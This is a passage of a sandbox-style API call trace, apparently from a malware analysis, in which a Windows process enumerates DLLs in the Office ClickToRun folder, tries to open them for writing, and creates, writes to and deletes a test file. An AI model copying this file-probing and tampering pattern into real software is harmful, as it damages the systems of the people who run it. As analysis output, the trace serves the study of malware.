Flags=0x0, Size=0x8) returned 0x7cef0 [0096.644] AreFileApisANSI () returned 1 [0096.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0096.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c5a8 [0096.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0096.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.645] GetFileType (hFile=0x418) returned 0x1 [0096.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0096.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0096.646] GetLastError () returned 0xb7 [0096.646] SetLastError (dwErrCode=0xb7) [0096.646] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0096.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0096.647] CloseHandle (hObject=0x418) returned 1 [0096.647] AreFileApisANSI () returned 1 [0096.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0096.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d028 [0096.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8d028, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0096.647] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll")) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0096.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0096.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.649] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c9565a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c9565a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1909ea00, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0x1, dwReserved1=0x0, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0096.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0096.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.650] AreFileApisANSI () returned 1 [0096.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll", lpUsedDefaultChar=0x0) returned 71 [0096.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0096.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0096.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.650] AreFileApisANSI () returned 1 [0096.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0096.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0096.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 71 [0096.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.650] GetFileType (hFile=0x418) returned 0x1 [0096.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0096.650] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.651] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.651] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.651] CloseHandle (hObject=0x418) returned 1 [0096.651] AreFileApisANSI () returned 1 [0096.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0096.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b110 [0096.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 71 [0096.651] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.651] GetLastError () returned 0x20 [0096.651] GetLastError () returned 0x20 [0096.652] SetLastError (dwErrCode=0x20) [0096.652] GetLastError () returned 0x20 [0096.652] SetLastError (dwErrCode=0x20) [0096.652] GetLastError () returned 0x20 [0096.652] SetLastError (dwErrCode=0x20) [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0096.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.652] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0096.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0096.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0096.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.653] AreFileApisANSI () returned 1 [0096.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll", lpUsedDefaultChar=0x0) returned 71 [0096.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0096.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0096.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.653] AreFileApisANSI () returned 1 [0096.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0096.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0096.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 71 [0096.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.653] GetFileType (hFile=0x418) returned 0x1 [0096.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0096.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.654] CloseHandle (hObject=0x418) returned 1 [0096.654] AreFileApisANSI () returned 1 [0096.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0096.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a828 [0096.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 71 [0096.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.654] GetLastError () returned 0x20 [0096.654] GetLastError () returned 0x20 [0096.655] SetLastError (dwErrCode=0x20) [0096.655] GetLastError () returned 0x20 [0096.655] SetLastError (dwErrCode=0x20) [0096.655] GetLastError () returned 0x20 [0096.655] SetLastError (dwErrCode=0x20) [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0096.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.655] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c4400, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0096.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0096.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.656] AreFileApisANSI () returned 1 [0096.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 